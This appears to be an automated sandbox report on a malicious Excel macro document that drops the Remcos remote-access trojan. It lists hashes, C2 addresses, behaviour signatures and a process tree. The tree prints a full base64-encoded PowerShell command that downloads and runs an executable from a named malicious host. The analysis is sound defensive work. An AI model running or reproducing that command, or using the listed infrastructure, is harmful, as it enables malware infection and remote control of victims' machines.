Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    15-04-2021 09:33

General

  • Target

    SOA.xlsm

  • Size

    18KB

  • MD5

    5af73df3782494331cb85c3278054f94

  • SHA1

    f4ddfd5507b0f92caec0588309d75292daa28693

  • SHA256

    eb065c4072ee30b3644a847c8f28044eb183977f39e1f90de08d098d8dd70eec

  • SHA512

    6ee5a826804664593d336a19c317e30f13f9d0d902f75bcef4668b30de08016e23a85575090248a376f5ac1afc36f13f17599b062dcf07da46eb3a8f732a4483

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://a0532749.xsph.ru/RR.exe

Extracted

Family

remcos

C2

shahzad73.ddns.net:2404

shahzad73.casacam.net:2404

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SOA.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\system32\cmd.exe
        cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1732
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:632
    • C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
      C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3788
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eHVFQKLt" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE3BE.tmp"
        3⤵
        • Creates scheduled task(s)
        PID:208
      • C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
        "{path}"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:3748

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
    MD5

    f31d91bf0dde9b21c9ab64883fe5e022

    SHA1

    675362cb546323a38842f3dbd000def375f9760f

    SHA256

    39fc3bd4df8f4ef4f7ceaa9d41626bf066fa423db69713eaf3105e4bf97fc3da

    SHA512

    0f4e66006d71f37b2179d67a905923868ef0832aefa1929e7d9d0fa9d4ef7278d7509579463ff7b3a3d6f3992f4816c2e82975df5c4ed982d4b1ed6b06071ab9

  • C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
    MD5

    f31d91bf0dde9b21c9ab64883fe5e022

    SHA1

    675362cb546323a38842f3dbd000def375f9760f

    SHA256

    39fc3bd4df8f4ef4f7ceaa9d41626bf066fa423db69713eaf3105e4bf97fc3da

    SHA512

    0f4e66006d71f37b2179d67a905923868ef0832aefa1929e7d9d0fa9d4ef7278d7509579463ff7b3a3d6f3992f4816c2e82975df5c4ed982d4b1ed6b06071ab9

  • C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
    MD5

    f31d91bf0dde9b21c9ab64883fe5e022

    SHA1

    675362cb546323a38842f3dbd000def375f9760f

    SHA256

    39fc3bd4df8f4ef4f7ceaa9d41626bf066fa423db69713eaf3105e4bf97fc3da

    SHA512

    0f4e66006d71f37b2179d67a905923868ef0832aefa1929e7d9d0fa9d4ef7278d7509579463ff7b3a3d6f3992f4816c2e82975df5c4ed982d4b1ed6b06071ab9

  • C:\Users\Admin\AppData\Local\Temp\tmpE3BE.tmp
    MD5

    bbfd93a5e28f4f3510d17606b2769cc8

    SHA1

    f997b645cdd0efc248deee2327096fd82579d614

    SHA256

    ff15bf6dfe658b8dd2b0a357d5a0b1768f0a2ce1125266d645b374e68ec696ea

    SHA512

    0a52760a5c4cf07387b361e09e6e63cc31aa143688a819581db0d12b75bf4d4fccb14932b87de088c076ece865f6030f5f74c18c76e9b8a109a97ce06fb51a49

  • memory/208-189-0x0000000000000000-mapping.dmp
  • memory/632-181-0x0000000000000000-mapping.dmp
  • memory/632-184-0x000001D7CFC46000-0x000001D7CFC48000-memory.dmp
    Filesize

    8KB

  • memory/632-183-0x000001D7CFC43000-0x000001D7CFC45000-memory.dmp
    Filesize

    8KB

  • memory/632-182-0x000001D7CFC40000-0x000001D7CFC42000-memory.dmp
    Filesize

    8KB

  • memory/1732-180-0x0000000000000000-mapping.dmp
  • memory/2256-121-0x00007FF85A170000-0x00007FF85A180000-memory.dmp
    Filesize

    64KB

  • memory/2256-123-0x00007FF878CF0000-0x00007FF87ABE5000-memory.dmp
    Filesize

    31.0MB

  • memory/2256-122-0x00007FF87ABF0000-0x00007FF87BCDE000-memory.dmp
    Filesize

    16.9MB

  • memory/2256-114-0x00007FF6B3180000-0x00007FF6B6736000-memory.dmp
    Filesize

    53.7MB

  • memory/2256-118-0x00007FF85A170000-0x00007FF85A180000-memory.dmp
    Filesize

    64KB

  • memory/2256-117-0x00007FF85A170000-0x00007FF85A180000-memory.dmp
    Filesize

    64KB

  • memory/2256-116-0x00007FF85A170000-0x00007FF85A180000-memory.dmp
    Filesize

    64KB

  • memory/2256-115-0x00007FF85A170000-0x00007FF85A180000-memory.dmp
    Filesize

    64KB

  • memory/2704-179-0x0000000000000000-mapping.dmp
  • memory/3748-191-0x0000000000413FA4-mapping.dmp
  • memory/3748-193-0x0000000000400000-0x0000000000421000-memory.dmp
    Filesize

    132KB

  • memory/3788-186-0x0000000000000000-mapping.dmp
  • memory/3788-188-0x00000000071C0000-0x00000000076BE000-memory.dmp
    Filesize

    5.0MB